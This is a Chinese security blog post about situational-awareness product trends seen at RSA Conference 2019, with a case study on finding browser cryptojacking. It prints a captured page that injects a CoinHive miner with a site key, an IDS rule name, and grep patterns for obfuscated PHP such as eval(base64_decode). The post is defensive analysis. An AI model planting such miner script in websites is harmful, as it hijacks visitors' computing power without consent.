RSA Conference 2019——态势感知产品进化论

bt0sea 系统安全 2019年3月11日发布
Favorite收藏

导语:RSA Conference 2019正在美国拉开帷幕,今年的主题是better,从0到1的安全产品目前没怎么看到,大部分的微创新创新都来自于已经固化的产品形态。态势感知做为这两年新出来的产品形态,我想也应该吸收一下大会的精髓。

0x00、前言

RSA Conference 2019正在美国拉开帷幕,它代表全球顶尖的安全盛宴,作为安全行业中人也小小的研究了一下。今年的主题是better,从0到1的安全产品目前没怎么看到,大部分的微创新创新都来自于已经固化的产品形态。态势感知做为这两年新出来的产品形态,我想也应该吸收一下大会的精髓。

· 1、云原始安全产品将逐步扩大自己的安全产品线,以满足云上用户对安全的需求,做到传统安全无缝迁移到云安全。

· 2、所有的产品都要支持多公有云、混合云、专有云环境。态势感知更加明显,例如:不能把鸡蛋放一个篮子里的多公有云数据融合,ToG专有政务云、电子政务外网和互联网区的安全数据融合、以及现在炒的很火的城市云大业态安全。

· 3、态势感知除了保护云主机外,今年的趋势要增加云物理机和容器。甚至微服务(API)。容器是一个明显的趋势。这就需要产品对容器安全有深入理解和切实可行的改造方案。

· 4、态势感知产品本身的threat hunting也是要加强的部分,除了纵深防御各个安全组件的全量部署,还需要对主机安全加强 轻量级EDR是今天产品研发的重点。还有及时原来传统的SOC中的log feed的过程也要支撑,还好现在有flume可以更好的把事件日志格式归一处理后发送给态势感知。

· 5、最后就是入侵检测算法部分,C2隐藏通讯检测、DNS隐藏隧道检测、告警图分析、有效的kill-chain关联分析部分。这部分需要使用KDE时序统计分析、图分析等技术。

0x01、实际案例分析

网页挖矿在公有云里非常常见的一种入侵行为。下面我就以它的实际案例分析。

tip1:什么是加密挖掘恶意软件(CoinHive Javascript)?

CoinHive是一种在线服务,提供可以使用JavaScript安装在网站上的加密货币采矿者,JavaScript矿工在网站访问者的浏览器中运行并在区块链上挖矿。它被宣传为在网站上放置广告的替代方案。事实证明,它被黑客用作恶意软件,首先通过感染网站来劫持网站的最终客户。

要使用CoinHive挖矿,您所要做的就是在网站的页眉/页脚中放置一个小的JavaScript代码段。当访问者访问该站点时,CoinHive JavaScript将被激活并开始利用其可用的CPU功率。现场有10-20名活跃的矿工,平均月收入约为0.25 XMR(约88美元)。为了增加收入,黑客一直在通过注入加密挖掘恶意软件来利用易受攻击的网站(CoinHive)。

虽然CoinHive本身并不是恶意服务,但它已被黑客广泛用于使用被黑网站挖掘硬币。因此,许多恶意软件扫描程序和安全机构已将该域列入黑名单。

tip2:如何查找挖矿脚本

我们先使用IDS规则:

ET CURRENT_EVENTS CoinHive In-Browser Miner Detected

<html>

<head>
.<meta http-equiv="Content-Type" content="text/html;charset=windows-1251">
.<title>"http://220.119.63.29/phpMyAdmin123/index.php"</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
.var miner = new CoinHive.Anonymous('48zUYBdsYIIfcmIn3S38ss81A17xGkpA', {throttle: 0.1});
.miner.start(CoinHive.FORCE_EXCLUSIVE_TAB);
</script>
</head>

<frameset>
<frame src="http://220.119.63.29/phpMyAdmin123/index.php"></frame>
</frameset>
</html>

客户端查找规则:

find /var/www -name "*.php" -exec grep -l "eval(" {} \;出现以下需要查询结果需要重点检查。

1、gzinflate(BASE64_DECODE

2、coinhive

3、BASE64_DECODE

4、eval(BASE64_DECODE

一般攻击者瞄准WordPressDrupal站点因为它们是最常用的。如果攻击成功,那么您的系统将变慢,从而给访问者带来不便。

tip3:几种特殊的情况:

· docker挖矿:在案例调查的过程当中,我们发现很多隐藏的挖矿者,已经把挖矿程序隐藏到docker中,具体检查,可参考我前面文章linux容器安全探索。

· cdn挖矿:目前还没有找到。

tips4:图分析

为了更准确的挖掘出矿山与入侵主机的关系,我们把安全告警数据导入到graph Database中分析。

· 节点(Node):受影响资产节点,攻击IP节点。

· 边(Edge):攻击关系或者事件危险等级。

屏幕快照 2019-03-10 上午9.06.04.png

0x02、总结

态势感知是一个综合性的产品,同时涉及的安全技术领域也非常广泛。目前各大公有云厂商都非常关注SOC产品化,包括google出了Backstory专门解决安全关联分析。微软Azure也出了Sentinel。将来态势感知产品的竞争会更激烈,具备硬核内功才是关键。

本文为 bt0sea 原创稿件,授权嘶吼独家发布,如若转载,请注明原文地址: https://www.4hou.com/system/16662.html
点赞 3
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论